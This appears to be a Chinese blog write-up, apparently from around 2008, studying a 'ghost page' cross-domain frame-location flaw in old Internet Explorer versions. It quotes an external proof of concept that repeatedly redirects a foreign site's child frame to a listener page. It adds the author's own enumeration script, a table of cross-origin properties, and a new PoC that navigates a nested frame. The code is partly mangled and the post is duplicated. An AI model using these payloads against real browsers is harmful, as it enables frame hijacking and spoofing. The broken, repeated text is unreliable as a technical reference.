为了不落后,也学习下鬼页。
先看下POC
http://sirdarckcat.blogspot.com/2008/05/ghosts-for-ie8-and-ie75730.html
代码:
出于好奇和进一步发掘,我们遍历了这个 ‘x’ 对象。
代码
";
for(var p in obj){
if(typeof(obj[p])=="function"){
obj[p]();
}else{
try
{
props+="
";
}
catch (ex)
{
props+= "
";
}
}
}
document.write(props+"
");
}
// Opens the target page in a new window; `x` is assigned as an implicit global so
// the timer callback below can reach it.
x=open('http://planet.ph4nt0m.org/');
// After 5 s, enumerates the first child frame of the opened window with allPrpos
// (defined earlier in this script). The results table that follows shows which
// properties IE exposed cross-origin; "Access is denied." marks the ones it blocked.
setTimeout(function(){allPrpos(x.frames[0])},5000);
</script>
结果:
除了以 on 开头的一些事件外,只有下面几个属性可以访问。
也就是说,POC 代码中的 x.frames[0].location 是有据可依的。我们继续测试:是否只有“鬼页”的
x.frames[0].location 可以控制呢?简单修改下代码,遍历 iframe 对象:
";
for(var p in obj){
if(typeof(obj[p])=="function"){
obj[p]();
}else{
try
{
props+="
";
}
catch (ex)
{
props+= "
";
}
}
}
document.write(props+"
");
}
// Same enumeration as before, but this time the target is the nested frame inside
// the page's own <iframe id="frm"> (document.frames[0].frames[0]) rather than a
// window returned by open(); allPrpos is defined earlier in this script.
setTimeout(function(){allPrpos(document.frames[0].frames[0])},5000);
</script>
id="frm" src="http://planet.ph4nt0m.org/" width="80%" height="100%">
同样得到可访问的对象 location。
新的POC:
最后的测试结果是:在 IE7/IE6 下可以用本文提到的方式控制子 frame 的 location,却无法执行伪协议,有待进一步测试。
先看下POC
http://sirdarckcat.blogspot.com/2008/05/ghosts-for-ie8-and-ie75730.html
代码:
javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return%20'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);QZ说 这段代码展示了跨域操作location ,事实也是。
出于好奇和进一步发掘,我们遍历了这个 ‘x’ 对象。
代码
<script language="javascript"> function allPrpos(obj) { // 遍历对象 var props = "
名称 | 值 |
"+p + " | " + obj[ p ] + " |
"+p + " | " +ex.message+" |
结果:
名称 | 值 |
onbeforeunload | null |
onafterprint | null |
top | [object] |
location | |
parent | [object] |
offscreenBuffering | Access is denied. |
frameElement | Access is denied. |
onerror | null |
screen | Access is denied. |
event | Access is denied. |
clipboardData | Access is denied. |
onresize | null |
defaultStatus | Access is denied. |
onblur | null |
window | [object] |
onload | null |
onscroll | null |
screenTop | Access is denied. |
onfocus | null |
Option | Access is denied. |
length | 0 |
onbeforeprint | null |
frames | [object] |
self | [object] |
clientInformation | Access is denied. |
XMLHttpRequest | Access is denied. |
external | Access is denied. |
screenLeft | Access is denied. |
opener | undefined |
onunload | null |
document | Access is denied. |
closed | false |
history | Access is denied. |
Image | Access is denied. |
navigator | Access is denied. |
status | Access is denied. |
onhelp | null |
name | Access is denied. |
top | [object] |
location | |
parent | [object] |
window | [object] |
length | 0 |
closed | false |
x.frames[0].location 可控制呢,简单修改下代码遍历 iframe 对象:
<script language="javascript"> function allPrpos(obj) { // 遍历对象 var props = "
名称 | 值 |
"+p + " | " + obj[ p ] + " |
"+p + " | " +ex.message+" |
id="frm" src="http://planet.ph4nt0m.org/" width="80%" height="100%">
同样得到可访问的对象 location。
top | [object] |
location | |
parent | [object] |
新的POC:
<script language="javascript"> /* Final PoC: after 5 s, navigates the nested frame inside the page's <iframe id="frm"> by assigning a fresh location object. `new location(...)` is not part of the standard DOM (location is not constructible there); this relies on IE-specific behavior. Per the author's result below, on IE6/IE7 this changed the child frame's location but could not run a pseudo-protocol URL. */ setTimeout(function(){document.frames[0].frames[0].location=new location("//www.cncert.net")},5000); </script>
id="frm" src="http://planet.ph4nt0m.org/" width="80%" height="100%">
最后的测试结果是:在 IE7/IE6 下可以用本文提到的方式控制子 frame 的 location,却无法执行伪协议,有待进一步测试。